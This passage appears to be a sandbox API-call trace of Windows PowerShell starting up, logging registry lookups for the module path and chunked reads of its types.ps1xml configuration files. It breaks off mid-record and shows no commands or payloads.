[0052.050] GetLastError () returned 0x3 [0052.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.050] GetLastError () returned 0x3 [0052.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.050] GetLastError () returned 0x3 [0052.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.050] GetLastError () returned 0x3 [0052.051] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0052.051] GetLastError () returned 0x3 [0052.064] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3175c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0052.064] GetLastError () returned 0x3 [0052.064] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ebb0 | out: phkResult=0x14ebb0*=0x320) returned 0x0 [0052.064] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14ebf4, lpData=0x0, lpcbData=0x14ebf0*=0x0 | out: lpType=0x14ebf4*=0x2, lpData=0x0, lpcbData=0x14ebf0*=0x6c) returned 0x0 [0052.064] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14ebf4, lpData=0x3175c0, lpcbData=0x14ebf0*=0x6c | out: lpType=0x14ebf4*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x14ebf0*=0x6c) returned 0x0 [0052.064] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x3175c0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0052.064] GetLastError () returned 0x3 [0052.064] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3175c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0052.065] GetLastError () returned 0x3 [0052.065] RegCloseKey (hKey=0x320) returned 0x0 [0052.065] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3175c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0052.065] GetLastError () returned 0x3 [0052.066] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ebb0 | out: phkResult=0x14ebb0*=0x320) returned 0x0 [0052.066] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14ebf4, lpData=0x0, lpcbData=0x14ebf0*=0x0 | out: lpType=0x14ebf4*=0x0, lpData=0x0, lpcbData=0x14ebf0*=0x0) returned 0x2 [0052.066] RegCloseKey (hKey=0x320) returned 0x0 [0052.083] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3175c0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\Documents") returned 0x0 [0052.083] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", nBufferLength=0x105, lpBuffer=0x14e718, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", lpFilePart=0x0) returned 0x22 [0052.084] GetLastError () returned 0x3f0 [0052.085] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0052.085] GetLastError () returned 0x3f0 [0052.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.092] GetLastError () returned 0xcb [0052.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.092] GetLastError () returned 0xcb [0052.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.104] GetLastError () returned 0xcb [0052.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.104] GetLastError () returned 0xcb [0052.107] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14eb30 | out: phkResult=0x14eb30*=0x328) returned 0x0 [0052.108] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x14eb98, lpData=0x0, lpcbData=0x14eb94*=0x0 | out: lpType=0x14eb98*=0x1, lpData=0x0, lpcbData=0x14eb94*=0x74) returned 0x0 [0052.109] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x14eb78, lpData=0x0, lpcbData=0x14eb74*=0x0 | out: lpType=0x14eb78*=0x1, lpData=0x0, lpcbData=0x14eb74*=0x74) returned 0x0 [0052.109] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x14eb78, lpData=0x3175c0, lpcbData=0x14eb74*=0x74 | out: lpType=0x14eb78*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14eb74*=0x74) returned 0x0 [0052.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14e6f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0052.109] GetLastError () returned 0xcb [0052.109] SetErrorMode (uMode=0x1) returned 0x1 [0052.109] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14eb78 | out: lpFileInformation=0x14eb78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xbb369540, ftLastAccessTime.dwHighDateTime=0x1d2f5d7, ftLastWriteTime.dwLowDateTime=0xbb369540, ftLastWriteTime.dwHighDateTime=0x1d2f5d7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0052.110] GetLastError () returned 0xcb [0052.110] SetErrorMode (uMode=0x1) returned 0x1 [0052.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0052.112] GetLastError () returned 0xcb [0052.113] SetErrorMode (uMode=0x1) returned 0x1 [0052.113] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb6c | out: lpFileInformation=0x14eb6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0052.113] GetLastError () returned 0xcb [0052.113] SetErrorMode (uMode=0x1) returned 0x1 [0052.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0052.115] GetLastError () returned 0xcb [0052.115] SetErrorMode (uMode=0x1) returned 0x1 [0052.115] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb6c | out: lpFileInformation=0x14eb6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0052.116] GetLastError () returned 0xcb [0052.116] SetErrorMode (uMode=0x1) returned 0x1 [0052.119] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.119] GetLastError () returned 0xcb [0052.120] GetACP () returned 0x4e4 [0052.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e57c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0052.149] GetLastError () returned 0x0 [0052.149] SetErrorMode (uMode=0x1) returned 0x1 [0052.151] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c [0052.151] GetLastError () returned 0x0 [0052.152] GetFileType (hFile=0x32c) returned 0x1 [0052.152] SetErrorMode (uMode=0x1) returned 0x1 [0052.152] GetFileType (hFile=0x32c) returned 0x1 [0052.153] ReadFile (in: hFile=0x32c, lpBuffer=0x201c110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x201c110*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.160] GetLastError () returned 0x0 [0052.161] ReadFile (in: hFile=0x32c, lpBuffer=0x201c110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x201c110*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.161] GetLastError () returned 0x0 [0052.161] ReadFile (in: hFile=0x32c, lpBuffer=0x201c110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x201c110*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.161] GetLastError () returned 0x0 [0052.162] ReadFile (in: hFile=0x32c, lpBuffer=0x201c110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x201c110*, lpNumberOfBytesRead=0x14eae4*=0xcf3, lpOverlapped=0x0) returned 1 [0052.162] GetLastError () returned 0x0 [0052.162] ReadFile (in: hFile=0x32c, lpBuffer=0x201b5a3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x201b5a3*, lpNumberOfBytesRead=0x14eae4*=0x0, lpOverlapped=0x0) returned 1 [0052.162] GetLastError () returned 0x0 [0052.162] ReadFile (in: hFile=0x32c, lpBuffer=0x201c110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x201c110*, lpNumberOfBytesRead=0x14eae4*=0x0, lpOverlapped=0x0) returned 1 [0052.162] GetLastError () returned 0x0 [0052.163] CloseHandle (hObject=0x32c) returned 1 [0052.163] GetLastError () returned 0x0 [0052.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e644, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0052.164] GetLastError () returned 0x0 [0052.164] SetErrorMode (uMode=0x1) returned 0x1 [0052.164] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x202d484 | out: lpFileInformation=0x202d484*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0052.164] GetLastError () returned 0x0 [0052.164] SetErrorMode (uMode=0x1) returned 0x1 [0052.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0052.165] GetLastError () returned 0x0 [0052.165] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea68 | out: phkResult=0x14ea68*=0x32c) returned 0x0 [0052.165] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14eab0, lpData=0x0, lpcbData=0x14eaac*=0x0 | out: lpType=0x14eab0*=0x1, lpData=0x0, lpcbData=0x14eaac*=0x56) returned 0x0 [0052.165] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14eab0, lpData=0x3175c0, lpcbData=0x14eaac*=0x56 | out: lpType=0x14eab0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14eaac*=0x56) returned 0x0 [0052.166] RegCloseKey (hKey=0x32c) returned 0x0 [0052.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0052.166] GetLastError () returned 0x0 [0052.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0052.166] GetLastError () returned 0x0 [0052.230] GetSystemInfo (in: lpSystemInfo=0x14e1e8 | out: lpSystemInfo=0x14e1e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0052.231] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e57c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0052.249] GetLastError () returned 0x0 [0052.249] SetErrorMode (uMode=0x1) returned 0x1 [0052.249] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c [0052.249] GetLastError () returned 0x0 [0052.249] GetFileType (hFile=0x32c) returned 0x1 [0052.249] SetErrorMode (uMode=0x1) returned 0x1 [0052.249] GetFileType (hFile=0x32c) returned 0x1 [0052.249] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.256] GetLastError () returned 0x0 [0052.256] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.258] GetLastError () returned 0x0 [0052.258] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.258] GetLastError () returned 0x0 [0052.258] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.258] GetLastError () returned 0x0 [0052.258] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.258] GetLastError () returned 0x0 [0052.259] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.259] GetLastError () returned 0x0 [0052.259] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.259] GetLastError () returned 0x0 [0052.259] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.259] GetLastError () returned 0x0 [0052.259] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.259] GetLastError () returned 0x0 [0052.260] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.260] GetLastError () returned 0x0 [0052.260] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.260] GetLastError () returned 0x0 [0052.260] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.260] GetLastError () returned 0x0 [0052.260] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.260] GetLastError () returned 0x0 [0052.260] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.260] GetLastError () returned 0x0 [0052.261] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.261] GetLastError () returned 0x0 [0052.261] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.261] GetLastError () returned 0x0 [0052.261] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.261] GetLastError () returned 0x0 [0052.262] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.262] GetLastError () returned 0x0 [0052.263] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.263] GetLastError () returned 0x0 [0052.263] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.263] GetLastError () returned 0x0 [0052.263] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.263] GetLastError () returned 0x0 [0052.263] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.263] GetLastError () returned 0x0 [0052.263] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.263] GetLastError () returned 0x0 [0052.263] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.263] GetLastError () returned 0x0 [0052.263] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.263] GetLastError () returned 0x0 [0052.263] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.263] GetLastError () returned 0x0 [0052.264] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.264] GetLastError () returned 0x0 [0052.264] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.264] GetLastError () returned 0x0 [0052.264] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.264] GetLastError () returned 0x0 [0052.264] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.264] GetLastError () returned 0x0 [0052.264] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.264] GetLastError () returned 0x0 [0052.264] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, 